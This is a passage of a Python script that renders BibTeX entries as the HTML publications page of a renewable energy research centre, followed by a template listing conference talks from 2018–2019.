            if 'formattedauthor' in allEntries[i].keys():
                formattedAuthor = allEntries[i]['formattedauthor']
            if 'formattedtitle' in allEntries[i].keys():
                formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
            if 'journal' in allEntries[i].keys():
                journal = ', <em>%s</em> ' % (
                    allEntries[i]['journal'])
            if 'year' in allEntries[i].keys():
                year = '<strong>%s</strong>,' % allEntries[i]['year']
            # volume(number) when both exist, otherwise whichever is present.
            if 'volume' in allEntries[i].keys():
                if 'number' in allEntries[i].keys():
                    volume = '<em>%s(%s)</em>' % (
                        allEntries[i]['volume'], allEntries[i]['number'])
                else:
                    volume = '<em>%s</em>' % (allEntries[i]['volume'])
            elif 'number' in allEntries[i].keys():
                number = '<em>%s</em>' % (allEntries[i]['number'])
            if 'pages' in allEntries[i].keys():
                pages = ','+allEntries[i]['pages']
            # A citation count of '0' is still emitted but hidden via display:none.
            if 'cited' in allEntries[i].keys():
                if allEntries[i]['cited'] != '0':
                    cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
                else:
                    cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
            # Default to the "IF 2019" label unless an explicit IF year is given.
            if 'impactfactor' in allEntries[i].keys():
                if 'impactfactoryear' not in allEntries[i].keys():
                    impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
                else:
                    impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
            if 'url' in allEntries[i].keys():
                url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
                    allEntries[i]['url'], allEntries[i]['url'])
            # Assemble the fragments into one list item.
            tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
                journal + year + volume + number + pages + cited + impactFactor + url
            tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
            bookBody = bookBody + tempHtml
    # Continue the numbering after the article list.
    (totalarticles, articaltotalcitations, hindex, i10index,
     citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
    b = totalarticles+1
    bookBody = '<ol start=%s style="margin-top: 0px;padding-top:0px">%s</ol>' % (
        b, bookBody)
    book = book + bookBody
    return book
def generateProceedHtml(bibFilePath):
    """Build the 'Proceedings' section of the page and return it as HTML.

    Renders every 'inproceedings' entry of *bibFilePath* as one <li>;
    the <ol> numbering continues after the articles and book chapters.
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open(bibFilePath, encoding='utf8') as bibtexFile:
        ircreDatabase = bibtexparser.load(bibtexFile, parser)
    allEntries = ircreDatabase.entries.copy()
    (totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
    # Initial value is the section header with the proceedings count.
    proceed = '''
    <div id="proceedings" style="margin-top:20px;margin-bottom:20px;">
        <h3 class="title">
            <strong><a id="articles"></a>Proceedings</a></strong>
            <span class="listcountred">(<span id="totalarticles">'''+str(totalproceeds)+'''</span>)</span>
        </h3>
    </div>'''
    proceedBody = ''
    for i in range(len(allEntries)):
        # Per-entry HTML fragments; fields absent from the entry render as ''.
        tempHtml = ''
        hiho = ''
        image = ''
        formattedAuthor = ''
        formattedtTitle = ''
        journal = ''
        year = ''
        volume = ''
        number = ''
        pages = ''
        paperid = ''
        url = ''
        impactFactor = ''
        cited = ''
        if allEntries[i]['ENTRYTYPE'] == 'inproceedings':
            # Entries flagged as ESI highly cited get the badge + link.
            if 'hihoimage' in allEntries[i].keys():
                hiho = '''
            <div style=" height:40px; width:500px;text-align: left;"><img
                    src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
                <a class="hiholinka" a href="./%s"
                    target="_blank"><strong><em> %s</em></strong></a></div>
                ''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
            if 'image' in allEntries[i].keys():
                if 'imagewidth' in allEntries[i].keys():
                    imagewidth = allEntries[i]['imagewidth']
                    # NOTE(review): these are independent `if`s, not an elif
                    # chain; the final `else` pairs only with the
                    # 'Scientific Reports' test, so every other special width
                    # (and the duplicated 'Nature Communications' branch) is
                    # overwritten by the default 48px image. Structure kept
                    # as-is to preserve current output — confirm intent.
                    if imagewidth == 'MRS Proceedings':
                        image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="31" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Proceedings of the American Chemical Society':
                        image = '''<span style="float: left; width: 155px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Nature Communications':
                        image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Beilstein Journal of Nanotechnology':
                        image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Nature Communications':
                        image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Physical Review B':
                        image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Scientific Reports':
                        image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    else:
                        image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
            if 'formattedauthor' in allEntries[i].keys():
                formattedAuthor = allEntries[i]['formattedauthor']
            if 'formattedtitle' in allEntries[i].keys():
                formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
            if 'journal' in allEntries[i].keys():
                journal = ', <em>%s</em> ' % (
                    allEntries[i]['journal'])
            if 'year' in allEntries[i].keys():
                year = '<strong>%s</strong>,' % allEntries[i]['year']
            # volume(number) when both exist, otherwise whichever is present.
            if 'volume' in allEntries[i].keys():
                if 'number' in allEntries[i].keys():
                    volume = '<em>%s(%s)</em>' % (
                        allEntries[i]['volume'], allEntries[i]['number'])
                else:
                    volume = '<em>%s</em>' % (allEntries[i]['volume'])
            elif 'number' in allEntries[i].keys():
                number = '<em>%s</em>' % (allEntries[i]['number'])
            if 'pages' in allEntries[i].keys():
                pages = ','+allEntries[i]['pages']
            if 'cited' in allEntries[i].keys():
                if allEntries[i]['cited'] != '0':
                    cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
                else:
                    # Bug fix: the style attribute was missing its closing
                    # quote (style="display:none), which produced broken
                    # HTML; the sibling generators all close the quote.
                    cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
            # Default to the "IF 2019" label unless an explicit IF year is given.
            if 'impactfactor' in allEntries[i].keys():
                if 'impactfactoryear' not in allEntries[i].keys():
                    impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
                else:
                    impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
            if 'url' in allEntries[i].keys():
                url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
                    allEntries[i]['url'], allEntries[i]['url'])
            # Assemble the fragments into one list item.
            tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
                journal + year + volume + number + pages + cited + impactFactor + url
            tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
            proceedBody = proceedBody + tempHtml
    # Continue the numbering after the articles and book chapters.
    (totalarticles, articaltotalcitations, hindex, i10index,
     citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
    c = totalarticles+totalbooks+1
    proceedBody = '<ol start=%s style="margin-top: 0px;padding-top:0px">%s</ol>' % (
        c, proceedBody)
    proceed = proceed + proceedBody
    return proceed
def generateEditorialsHtml(bibFilePath):
    # Generate the Editorials section and return it as HTML.
    # (Original Chinese comment said "Articles" -- copy-paste leftover.)
    """Build the "Editorials" HTML section from a BibTeX file.

    Every entry whose ENTRYTYPE is 'incollection' is rendered as one <li>
    composed of author, title, journal, year, volume/number, pages,
    citation count, impact factor and URL -- each fragment is emitted only
    when the corresponding BibTeX field is present.

    Parameters
    ----------
    bibFilePath : str
        Path to the BibTeX file holding the editorial entries.

    Returns
    -------
    str
        Section heading plus an <ol> whose numbering continues after the
        article, book and proceedings counts.

    NOTE(review): depends on module-level names defined elsewhere in this
    file (BibTexParser, bibtexparser, getsothers, getstatistics) -- confirm
    they are in scope before moving this function.
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open(bibFilePath, encoding='utf8') as bibtexFile:
        ircreDatabase = bibtexparser.load(bibtexFile, parser)
    allEntries = ircreDatabase.entries.copy()
    (totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
    # Section heading with the total editorials count.
    # BUG FIX: removed a stray closing </a> after "Editorials".
    # NOTE(review): the anchor id "articles" and span id "totalarticles"
    # duplicate ids used by the Articles section; left unchanged in case the
    # page JavaScript keys on them -- confirm before renaming.
    editorials = '''
    <div id="editorials" style="margin-top:20px;margin-bottom:20px;">
        <h3 class="title">
            <strong><a id="articles"></a>Editorials</strong>
            <span class="listcountred">(<span id="totalarticles">'''+str(totaleditors)+'''</span>)</span>
        </h3>
    </div>'''
    editorialsBody = ''
    for i in range(len(allEntries)):
        # Per-entry fragments; empty string means "field absent, emit nothing".
        # (Removed the unused local 'paperid' from the original.)
        tempHtml = ''
        hiho = ''
        image = ''
        formattedAuthor = ''
        formattedtTitle = ''
        journal = ''
        year = ''
        volume = ''
        number = ''
        pages = ''
        url = ''
        impactFactor = ''
        cited = ''
        if allEntries[i]['ENTRYTYPE'] == 'incollection':
            # "ISI Highly Cited" banner.
            # NOTE(review): guarded on 'hihoimage' but reads 'hiholink' and
            # 'hihosubject' -- raises KeyError if those fields are missing.
            if 'hihoimage' in allEntries[i].keys():
                hiho = '''
                <div style=" height:40px; width:500px;text-align: left;"><img
                        src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
                    <a class="hiholinka" a href="./%s"
                        target="_blank"><strong><em> %s</em></strong></a></div>
                ''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
            if 'image' in allEntries[i].keys():
                if 'imagewidth' in allEntries[i].keys():
                    imagewidth = allEntries[i]['imagewidth']
                    # BUG FIX: this was a series of independent "if" tests with
                    # the final "else" attached only to the last one, so every
                    # journal except 'Scientific Reports' fell through to the
                    # default 48px thumbnail.  Rewritten as one if/elif/else
                    # chain.  The original also tested 'Nature Communications'
                    # twice; the later (108px) assignment won, so it is kept.
                    if imagewidth == 'The Scientific World Journal':
                        image = '''<span style="float: left; width: 138px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="132" height="50" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    elif imagewidth == 'MRS Proceedings':
                        image = '''<span style="float: left; width: 156px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="148" height="31" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    elif imagewidth == 'Nature Communications':
                        image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    elif imagewidth == 'Beilstein Journal of Nanotechnology':
                        image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    elif imagewidth == 'Physical Review B':
                        image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    elif imagewidth == 'Scientific Reports':
                        image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    else:
                        # Default cover thumbnail for unrecognized journals.
                        image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
            if 'formattedauthor' in allEntries[i].keys():
                formattedAuthor = allEntries[i]['formattedauthor']
            if 'formattedtitle' in allEntries[i].keys():
                formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
            if 'journal' in allEntries[i].keys():
                journal = ', <em>%s</em> ' % (
                    allEntries[i]['journal'])
            if 'year' in allEntries[i].keys():
                year = '<strong>%s</strong>,' % allEntries[i]['year']
            # Volume takes precedence; number only renders on its own when
            # there is no volume field.
            if 'volume' in allEntries[i].keys():
                if 'number' in allEntries[i].keys():
                    volume = '<em>%s(%s)</em>' % (
                        allEntries[i]['volume'], allEntries[i]['number'])
                else:
                    volume = '<em>%s</em>' % (allEntries[i]['volume'])
            elif 'number' in allEntries[i].keys():
                number = '<em>%s</em>' % (allEntries[i]['number'])
            if 'pages' in allEntries[i].keys():
                pages = ','+allEntries[i]['pages']
            if 'cited' in allEntries[i].keys():
                if allEntries[i]['cited'] != '0':
                    cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
                else:
                    # Zero-citation counts are emitted but hidden.
                    # BUG FIX: the style attribute was missing its closing
                    # quote ('display:none), producing malformed HTML.
                    cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
            if 'impactfactor' in allEntries[i].keys():
                # Falls back to the hard-coded "IF 2019" label when no
                # explicit impact-factor year is given.
                if 'impactfactoryear' not in allEntries[i].keys():
                    impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
                else:
                    impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
            if 'url' in allEntries[i].keys():
                url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
                    allEntries[i]['url'], allEntries[i]['url'])
            tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
                journal + year + volume + number + pages + cited + impactFactor + url
            tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
            editorialsBody = editorialsBody + tempHtml
    # Continue the global list numbering after articles, books and proceedings.
    (totalarticles, articaltotalcitations, hindex, i10index,
     citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
    d = totalarticles+totalbooks+totalproceeds+1
    editorialsBody = '<ol start=%s style="margin-top: 0px;padding-top:0px">%s</ol>' % (
        d, editorialsBody)
    editorials = editorials + editorialsBody
    return editorials
def generatehtml():
prebody = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<script src="./js/jquery.min.js" type="text/javascript"></script>
<script src="./js/moment.min.js" type="text/javascript"></script>
<script src="./js/reverse_list.js" type="application/javascript"></script>
<script async src="./js/popper.min.js" crossorigin="anonymous"></script>
<script async src="./js/bootstrap.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" async src="./js/bibtex_js.js"></script>
<style type="text/css">
.cited {font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
color: #00F;
float: right;
}
#bookchapters {width: 960px;
}
#bookchapters h3 {text-align: center;
margin-top: 21px;
margin-bottom: 0px;
}
#proceedings {width: 960px;
}
#proceedings h3 {text-align: center;
margin-top: 21px;
margin-bottom: 0px;
}
#editorials {width: 960px;
}
#editorials h3 {text-align: center;
margin-top: 21px;
margin-bottom: 0px;
}
</style>
<link rel="stylesheet" type="text/css" href="./css/ircre.css" media="all">
<title>
International Research Center for Renewable Energy
</title>
</head>
<body>
<div id="header-ban">
<p> </p>
<div id="logo"><img src="images/ircrelogo.jpg" width="360" height="153" alt=""></div>
<ul>
<li><a href="index.html"><span>home</span></a></li>
<li><a href="people.html"><span>People</span></a></li>
<li><a href="facility.html"><span>Facility</span></a></li>
<li><a href="about.html"><span>About IRCRE</span></a></li>
<li class="selected"><a href="research.html"><span>Research</span></a></li>
<li><a href="press.html">PRESS</a></li>
<li><a href="events.html"><span>EVENTS</span></a></li>
<li><a href="contact.html"><span>contact us</span></a></li>
</ul>
<p>
</div>
<div id="body">
<div class="products">
<div id="second-header-ban">
<span style="float: left;">
<h2 class="second-header-ban-title">RESEARCH</h2>
</span>
<ul id="second-header-menu">
<li id="second-menu-articles"><a href="#articles"><span>ARTICLES</span></a></li>
<li id="second-menu-bookchapters"><a href="#bookchapters"><span>BOOK CHAPTERS</span></a></li>
<li id="second-menu-conferences"><a href="#conferences"><span>CONFERENCES</span></a></li>
<li id="second-menu-organizers"><a href="#organizers"><span>ORGANIZERS</span></a></li>
<li id="second-menu-proceedings"><a href="#proceedings"><span>PROCEEDINGS</span></a></li>
<li id="second-menu-editorials"><a href="#editorials"><span>EDITORIALS</span></a></li>
<li id="second-menu-seminars"><a href="#seminars"><span>SEMINARS</span></a></li>
<li id="second-menu-committee"><a href="#committee"><span>COMMITTEE</span></a></li>
</ul>
</div>
'''
afterbody = '''
<div id="divconferences">
<h3><a id="conferences"></a><strong>International Conference /
Workshop Talks</strong> <span
class="listcount">(323)</span></h3>
<h4>
<strong>Plenary/keynote lecture</strong> <span class="invited">(<strong>62</strong>)</span>,
<strong>Invited
talk</strong> <span class="invited">(<strong>144</strong>)</span>, <strong>Oral
presentation</strong>
<span class="invited">(<strong>116</strong>)</span>, <strong>Panelist</strong> <span
class="invited">(<strong>1</strong>)</span>
</h4>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2019 (12)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="323">
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Aqueous Chemical Design & Electronic Structure Engineering of Advanced
HeteroNanostructures for Efficient Solar Energy Conversion</strong>”, 7th International
Forum
for Young Scholars, UESTC Fundamental & Frontier Sciences, Chengdu, China, December 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Opening Plenary</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, 2019 Fall
Meeting
of the Korean Ceramic Society, Seoul, South Korea, November 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, 7th
International
Workshop on Nanotechnology & Applications, Phan Thiet City, Vietnam, November 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session Chairs</strong>)</span>,
“<strong>On the Anisotropic Charge Separation and the Growth of Highly Ordered
Heteronanostructures for Efficient Photocatalytic Water Splitting</strong>”, 236th
Electrochemical Society Meeting, Symposium I04 on Photocatalysts, Photoelectrochemical Cells,
and
Solar Fuels 10, Atlanta, GA, USA, October 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session Chair</strong>)</span>,
“<strong>Sustainable Energy from Seawater</strong>”, 10th International Conference
on
Materials for Advanced Technology (ICMAT), Symposium CC on Novel Solution Processing for
Advanced
Functional Materials for Energy, Environmental and Biomedical, Singapore, June 2019
</li>
<li>
<strong><u>S.H. Shen</u></strong> <span class="invited">(<strong>Invited</strong>)</span>, T.T.
Kong,
“<strong>Structure Design of Graphitic Carbon Nitride for Photocatalytic Water
Splitting</strong>”, E-MRS Spring Meeting, IUMRS-ICAM International Conference on Advanced
Materials, Symposium A on Latest Advances in Solar Fuels, Acropolis, Nice, France, May 2019
</li>
<li>
<u>J.S. Pap</u> <span class="invited">(<strong>Invited</strong>)</span>, D. Lukács, M. Németh,
Ł.
Szyrwiel, L. Illés, B. Pécz, <strong>S.H. Shen</strong>, <strong>L. Vayssieres</strong>,
“<strong>Behavior of Cu-Peptides under Water Oxidation Conditions – Molecular
Electrocatalysts
or Precursors to Nanostructured CuO Films?</strong>”, E-MRS Spring Meeting, IUMRS-ICAM
International Conference on Advanced Materials, Symposium A on Latest Advances in Solar Fuels,
Acropolis, Nice, France, May 2019
</li>
<li>
<strong><u>I. Rodríguez-Gutiérrez</u></strong> <span
class="invited">(<strong>Invited</strong>)</span>, J.Z. Su, G. Rodríguez-Gattorno, F.L. de
                        Souza, G. Oskam, “<strong>Influence of the thin film physical configuration on the charge
transfer and recombination dynamics of WO<sub>3</sub>-BiVO<sub>4</sub> multilayer systems for
photoelectrochemical and solar fuel applications</strong>”, E-MRS Spring Meeting,
IUMRS-ICAM
International Conference on Advanced Materials, Symposium A on Latest Advances in Solar Fuels,
Acropolis, Nice, France, May 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Plenary Lecture & Session Chair</strong>)</span>, “<strong>Low-cost
Aqueous Design of Earth-abundant Nanostructures for Sustainable Energy from Seawater</strong>”,
International Symposium on Nanoscience & Nanotechnology in the Environment, Xi'an, China, April
2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, 257th ACS
National
Meeting, Symposium on Photocatalytic and Electrochemical Processes: Fundamentals and
Applications in
Green Energy and Environmental Remediation”, Orlando, FL, USA, March-April 2019
</li>
<li>
<strong><u>M. Fronzi</u></strong>, Hussein Assadi, Dorian Hanaor, “<strong>Theoretical
insights into the hydrophobicity of low index CeO<sub>2</sub> surfaces</strong>”, American
Physical Society (APS) March Meeting, Boston, MA, USA, March 2019
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, SPIE Photonics
West, Symposium on Synthesis & Photonics of Nanoscale Materials XVI, Session on Synthesis &
Photonics of Nanomaterials, San Francisco, CA, USA, February 2019
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2018 (27)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="311">
<li>
<strong>M. Fronzi</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Reactivity
of metal oxide nanocluster modified rutile and anatase TiO<sub>2</sub>: Oxygen vacancy formation
and
CO<sub>2</sub> interaction</strong>”, EMN Meeting on Titanium- Oxides, Auckland, New
Zealand,
December 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis</strong>”, International
Symposium on Solar Energy Conversion, Nankai University, Tianjin, China, October 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Keynote & Session Chairs</strong>)</span>,
“<strong>Clean & Sustainable Energy from Photocatalytic Seawater Splitting</strong>”,
2018 AiMES ECS - SMEQ Joint Conference, Cancun, Mexico, October 2018
</li>
<li>
<strong><u>I. Rodríguez-Gutiérrez</u></strong>, R. García-Rodríguez, A. Vega-Poot, <strong>J.Z.
Su</strong>, G. Rodríguez-Gattorno, <strong>L. Vayssieres</strong>, G. Oskam, “<strong>Analysis
of the Charge Transfer Dynamics in Oxide Based Photoelectrodes through Small Perturbations
Techniques</strong>”, America International Meeting on Electrochemistry and Solid State
Science (AiMES 2018), Cancun, Mexico, October 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>A Place in the Sun for Artificial Photosynthesis?</strong>”, Frontiers of
Photonics, 31st Annual Conference of the IEEE Photonics Society (IPC-2018), Reston, VA, USA,
September 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Clean Sustainable Energy (& More) from Seawater</strong>”, Symposium on
Photo-Electrochemical Energy Conversion in Honor of Prof. Jan Augustynski, 69th Annual Meeting
of
the International Society of Electrochemistry, Bologna, Italy, September 2018
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Structure
Engineering of Graphitic Carbon Nitride for Efficient Photocatalytic Water Splitting</strong>”,
Taishan Forum for Advanced Interdisciplinary Research (FAIR), Jinan, China, September 2018
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>D.M. Zhao</strong> <span
class="invited">(<strong>Invited</strong>)</span>, “<strong>Structure Engineering of
Graphitic Carbon Nitride for Efficient Photocatalytic Water Splitting</strong>”,
International
Workshop on Water Splitting: Challenges and Opportunity, Xi'an, China, August 2018
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Surface
Engineering of α-Fe<sub>2</sub>O<sub>3</sub> and p-Si for Efficient Solar Water
Splitting</strong>”,
22nd International Conference on Photochemical Conversion and Storage of Solar Energy, Hefei,
China,
July-August 2018
</li>
<li>
<strong><u>S.H. Shen</u></strong>, <strong>D.M. Zhao</strong> <span
class="invited">(<strong>Invited</strong>)</span>, “<strong>Structure Engineering of
Graphitic Carbon Nitride for Efficient Photocatalytic Water Splitting</strong>”,
International
Conference on Energy and Environmental Materials (ICEEM), Hefei, China, July-August 2018
</li>
<li>
<strong><u>I. Rodríguez-Gutiérrez</u></strong>, R. García-Rodríguez, A. Vega-Poot, <strong>J.Z.
Su</strong>, G. Rodríguez-Gattorno, <strong>L. Vayssieres</strong>, G. Oskam, “<strong>Understanding
the Charge Carrier Dynamics in Oxide Based Photoelectrodes</strong>”, 22<sup>nd</sup>
International Conference on Photochemical conversion and Storage of Solar Energy (IPS-22),
Hefei,
China, July 2018
</li>
<li>
<strong><u>M. Fronzi</u></strong>, S. Tawfik, C. Stampfl, M.J. Ford, “<strong>Magnetic
character of stoichiometric and reduced Co<sub>9</sub>S<sub>8</sub></strong>”, Australian
Symposium on Computationally Enhanced Materials Design, Sydney, Australia, July 2018
</li>
<li>
<strong><u>J.W. Shi</u></strong>, Y.Z. Zhang, L.J. Guo<span
class="invited"> (<strong>Invited</strong>)</span>, “<strong>Hydrothermal growth of
CO<sub>3</sub>(OH)<sub>2</sub>(HPO<sub>4</sub>)<sub>2</sub>
nano-needles on LaTiO<sub>2</sub>N for enhanced photocatalytic O<sub>2</sub> evolution under
visible-light irradiation</strong>”, 12th International Conference on Ceramic Materials
and
Components for Energy and Environmental Applications (CMCEE 2018), Singapore, July 2018
</li>
<li>
<strong><u>Y.B. Chen</u></strong>, Y. Liu <span
class="invited">(<strong>Invited</strong>)</span>,
“<strong>Switchable synthesis of copper-based chalcogenide films for photoelectrochemical
water splitting</strong>”, 12th International Conference on Ceramic Materials and
Components
for Energy and Environmental Applications (CMCEE 2018), Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>On Seawater & Clean Energy Generation</strong>”, 12th International
Conference
on Ceramic Materials and Components for Energy and Environmental Applications (CMCEE 2018),
Symposium T4S12 on Advanced Ceramics Materials for Photonics, Energy & Health, Singapore, July
2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Latest Advances in Low-cost Solar Fuel Generation</strong>”, 12th
International
Conference on Ceramic Materials and Components for Energy and Environmental Applications (CMCEE
                        2018), Symposium T1S3 on Emerging Materials & Technologies for Solar Cells & Solar Fuels
Technologies, Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Low-cost Fabrication of Advanced Heteronanostructures for Efficient Solar Energy
Conversion</strong>”, 12th International Conference on Ceramic Materials and Components
for
Energy and Environmental Applications (CMCEE 2018), Symposium T1S5 on Innovative Processing of
                        Nanostructured & Hybrid Functional Materials for Energy & Sustainability, Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Sustainable Clean Energy from Seawater</strong>”, 12th International
Conference
on Ceramic Materials and Components for Energy and Environmental Applications (CMCEE 2018),
Symposium T3S1 on Photocatalysts for Energy & Environmental Applications, Singapore, July 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Clean Energy from Seawater</strong>”, 26th Annual International Conference
on
Composites/Nano Engineering (ICCE-26), Paris, France, July 2018
</li>
<li>
<strong>M. Fronzi</strong>, “<strong>Native-defects-related magnetic character of cobalt
sulphide</strong>”, International Workshop on Materials Theory and Computation, Xi’an
Jiaotong
University, Xi'an, China, June-July 2018
</li>
<li>
<strong>S.H. Shen</strong> <span
class="invited">(<strong>Invited talk & International Advisory Board</strong>)</span>,
“<strong>Engineering Hematite and Silicon for Efficient Photoelectrochemical Water
Splitting,
Symposium CE: Frontiers in Nanostructured, Nanocomposite and Hybrid Functional Materials for
Energy
and Sustainability</strong>”, 14th International Ceramics Congress (CIMTEC 2018), Perugia,
Italy, June 2018
</li>
<li>
<strong>L. Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session Chair</strong>)</span>, “<strong>Latest
Advances in Design, Performance, & Stability of Solar Seawater Splitting Materials</strong>”,
233rd Electrochemical Society Meeting, Seattle, WA, USA, May 2018
</li>
<li>
